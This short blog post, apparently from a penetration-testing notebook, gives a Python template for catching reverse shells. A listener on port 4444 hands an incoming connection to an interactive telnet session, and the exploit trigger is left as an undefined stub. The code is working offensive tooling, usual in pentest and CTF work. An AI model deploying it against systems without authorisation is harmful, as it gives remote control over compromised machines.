---
layout: post
title: 'template for receiving reverse shells in python'
tags: pt
---

```python
import telnetlib
import socket
import threading

def handler(lport):
    print ("[+] starting handler on port %d" % lport)
    t = telnetlib.Telnet()
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.bind(("0.0.0.0", lport))
    s.listen(1)
    conn, addr = s.accept()
    print ("[+] connection from %s" % addr[0])
    t.sock = conn
    print ("[+] welcome home :)")
    t.interact()

class ThreadWorker(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        while True:
            print ("[+] running in background")

def shell():
    handlerthr = threading.Thread(target=handler, args=(4444,)) #change port number accordingly
    handlerthr.daemon = True
    handlerthr.start()

    print ("[+] pokin' that shella")
    whatever_pokes_that_shell()
    pass
```
